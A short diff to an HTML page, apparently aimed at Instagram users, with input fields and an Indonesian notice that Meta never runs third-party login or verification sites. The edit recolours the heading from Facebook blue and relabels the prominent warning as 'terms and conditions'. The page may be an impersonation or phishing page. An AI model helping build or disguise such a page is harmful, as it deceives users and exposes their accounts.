--- a/index.html
+++ b/index.html
@@ -97,7 +97,7 @@
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css">
   <style>
     body { font-family: system-ui, sans-serif; background: #ffffff; color: #d1d5db; margin: 0; padding: 0; text-align: center; }
-    h1 { font-size: 2.8rem; font-weight: 900; color: #1877f2; text-transform: uppercase; letter-spacing: 2px; margin: 1.5rem 0; }
+    h1 { font-size: 2.8rem; font-weight: 900; color: #000000; text-transform: uppercase; letter-spacing: 2px; margin: 1.5rem 0; }
     .section { padding: 2rem 1rem; max-width: 600px; margin: 0 auto; }
     input, button { width: 100%; padding: 0.8rem; margin: 0.8rem 0; border-radius: 8px; border: 1px solid #4b5563; background: #1f2937; color: white; font-size: 1rem; }
     button { background: #ffffff; border: none; cursor: pointer; font-weight: bold; }
@@ -118,7 +118,7 @@
 
   <div class="section">
     <div class="warning">
-      ⚠️ PERINGATAN WAJIB BACA!<br><br>
+      SYARAT DAN KETENTUAN!<br><br>
 Meta Platforms menegaskan bahwa Instagram tidak pernah mengoperasikan, mengelola, atau mengesahkan situs pihak ketiga yang mengatasnamakan Instagram untuk keperluan login, verifikasi akun, hadiah, atau pemulihan akun.
 Kami mengimbau seluruh pengguna untuk:
 Selalu memastikan alamat situs diawali dengan instagram.com
